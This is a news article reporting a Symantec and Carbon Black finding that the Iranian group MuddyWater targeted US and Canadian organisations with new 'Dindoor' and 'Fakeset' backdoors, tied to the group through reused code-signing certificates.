Several US companies have been targeted by Iranian hacking group MuddyWater in a new campaign that started in early February and has continued after the US and Israeli military strikes on Iran.
The campaign was detected by the Threat Hunter Team at Broadcom’s Symantec and Carbon Black.
The potential victims include a US bank, a US airport, non-governmental organizations in both the US and Canada and the Israeli operation of a US software company that supplies the defense and aerospace sectors. Each of these organizations has experienced suspicious activity on their networks in recent days and weeks, said the Threat Hunter Team in a March 5 report.
The campaign involves a previously unknown backdoor, dubbed ‘Dindoor’ by the cyber threat researchers.
Reused Certificates Tie New Backdoors to Iran-Linked MuddyWater
The Dindoor backdoor was found by the threat researchers on the networks of the Israeli outpost of the software company, the US bank and the Canadian non-profit organization.
Signed with a certificate issued to “Amy Cherne,” this backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute.
The researchers also observed an attempt to exfiltrate data from the software company using Rclone, a command-line program to manage files on cloud storage, to a Wasabi cloud storage bucket. It is not clear if this attempt was successful.
A different, Python backdoor called Fakeset was found on the networks of the US airport. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”.
The Donald Gay certificate has been used previously to sign malware linked to MuddyWater, a hacking group active since 2017 and associated with the Iranian Ministry of Intelligence and Security (MOIS), also known as Seedworm, Temp Zagros and Static Kitten.
The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company.
The Donald Gay certificate was also used to sign a sample from the malware family the researchers track as ‘Stagecomp,’ which downloads the Darkcomp backdoor.
The Stagecomp and the Darkcomp malware have been linked to MuddyWater by security vendors, including Google, Microsoft and Kaspersky.
This malware wasn’t seen on the targeted networks, but the use of the same certificates suggests MuddyWater was involved, said the Threat Hunter Team.
“While we have disrupted these breaches, other organizations could still be vulnerable to attack,” the researchers added.
